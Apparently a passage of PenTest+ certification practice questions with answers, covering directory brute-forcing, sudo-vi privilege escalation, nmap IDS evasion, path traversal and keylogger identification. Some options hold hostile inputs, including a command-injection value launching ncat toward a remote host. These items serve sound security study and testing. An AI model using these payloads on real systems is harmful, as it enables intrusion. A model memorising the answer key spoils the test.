Which of the following tools would help a penetration tester locate a file that was uploaded to a content management system?
A. DirBuster
B. OpenVAS
C. Scout Suite
D. CeWL
A. DirBuster
Explanation
DirBuster is a tool that can brute-force directories and filenames on web servers. It can help a penetration tester locate a file that was uploaded to a content management system by trying different combinations of paths and names until it finds a match. DirBuster can also use wordlists to speed up the process and discover hidden files or directories.
References:
The Official CompTIA PenTest+ Instructor Guide (Exam PT0-002) eBook, page 156
Question 253:
After obtaining a reverse shell connection, a penetration tester runs the following command:
www-data@server12: sudo -l
User www-data may run the following commands on server12:
(root) NOPASSWD: /usr/bin/vi
Which of the following is the fastest way to escalate privileges on this server?
A. Editing the file /etc/passwd to add a new user with UID 0
B. Creating a Bash script, saving it in the /tmp folder, and then running it
C. Executing the command sudo vi -c ':!bash'
D. Editing the file /etc/sudoers to allow any command
C. Executing the command sudo vi -c ':!bash'
Explanation
When the penetration tester has NOPASSWD privileges to run vi as root, the quickest way to escalate privileges is to leverage vi to execute a shell. The command sudo vi -c ':!bash' opens vi as the root user and immediately spawns a shell within vi. This method is fast and effective because vi (or vim) has the capability to run shell commands. Executing sudo vi -c ':!bash' will open vi and then immediately run the :!bash command, which spawns a Bash shell with root privileges.
References:
GTFOBins - vi
Example from penetration testing reports where vi is used to escalate privileges: Writeup.
Question 254:
SIMULATION
A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.
INSTRUCTIONS
Select the appropriate answer(s), given the output from each section.
Output 1
A. Check the answer in explanation.
A. Check the answer in explanation.
Explanation
Question 255:
A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?
A. Badge cloning
B. Dumpster diving
C. Tailgating
D. Shoulder surfing
B. Dumpster diving
Explanation
Question 256:
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?
A. nmap -P0 -T0 -sS 192.168.1.10
B. nmap -sA -sV --host-timeout 60 192.168.1.10
C. nmap -f --badsum 192.168.1.10
D. nmap -A -n 192.168.1.10
C. nmap -f --badsum 192.168.1.10
Explanation
Question 257:
A penetration tester is validating whether input validation mechanisms have been implemented in a web application. Which of the following should the tester use to determine whether the application is vulnerable to path traversal attacks?
A. GET /image?filename=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts
B. GET /image?filename=lefitfe;pwd
C. POST /image?filename -
D. POST /image?filename=yhtak;ncat --ssl 192.168.0.1 2222
A. GET /image?filename=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts
Explanation
Question 258:
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. The most critical risks of web applications
B. A list of all the risks of web applications
C. The risks defined in order of importance
D. A web-application security standard
E. A risk-governance and compliance framework
F. A checklist of Apache vulnerabilities
A. The most critical risks of web applications
C. The risks defined in order of importance
Explanation
These two options best describe the OWASP Top 10. OWASP stands for Open Web Application Security Project, and its Top 10 is a list of the most critical web application security risks, based on data from various sources and experts. The list is updated periodically to reflect changes in technology and the threat landscape. The list also ranks the risks in order of importance based on their prevalence, impact, and ease of exploitation or remediation. The other options are not accurate descriptions of the OWASP Top 10. The list does not cover all the risks of web applications, but rather focuses on the most common and severe ones. The list is not a web application security standard, but rather a guideline or reference for developers, testers, and security professionals. The list is not a risk-governance and compliance framework, but rather a resource or tool for identifying and mitigating web application vulnerabilities. The list is not a checklist of Apache vulnerabilities, but rather a general list of web application risks that apply to any web server or platform.
Question 259:
Which of the following is the intended effect of this script?
A. Debugging an exploit
B. Keylogging
C. Collecting logs
D. Scheduling tasks
B. Keylogging
Explanation
The provided Python script is designed to function as a keylogger, which is a type of surveillance software that has the capability to record every keystroke made on a computer. The script uses the pyHook library to hook into and monitor all keyboard events. When a key is pressed, the KbrdEvent function is triggered, which logs the ASCII value of the pressed key to a file named log_comptia.txt located in C:\Windows\Temp. The script is configured to continuously monitor keyboard events and log them, making its intended effect keylogging, rather than debugging an exploit, collecting logs in a general sense, or scheduling tasks.
Question 260:
An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next.
Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible?
A. A list
B. A tree
C. A dictionary
D. An array
C. A dictionary
Explanation
Data structures are used to store data in an organized form, and some data structures are more efficient and suitable for certain operations than others. For example, hash tables, skip lists and jump lists are some dictionary data structures that can insert and access elements efficiently. For string comparison, there are different algorithms that can measure how similar two strings are, such as Levenshtein distance, Hamming distance or Jaccard similarity. Some of these algorithms can be implemented using data structures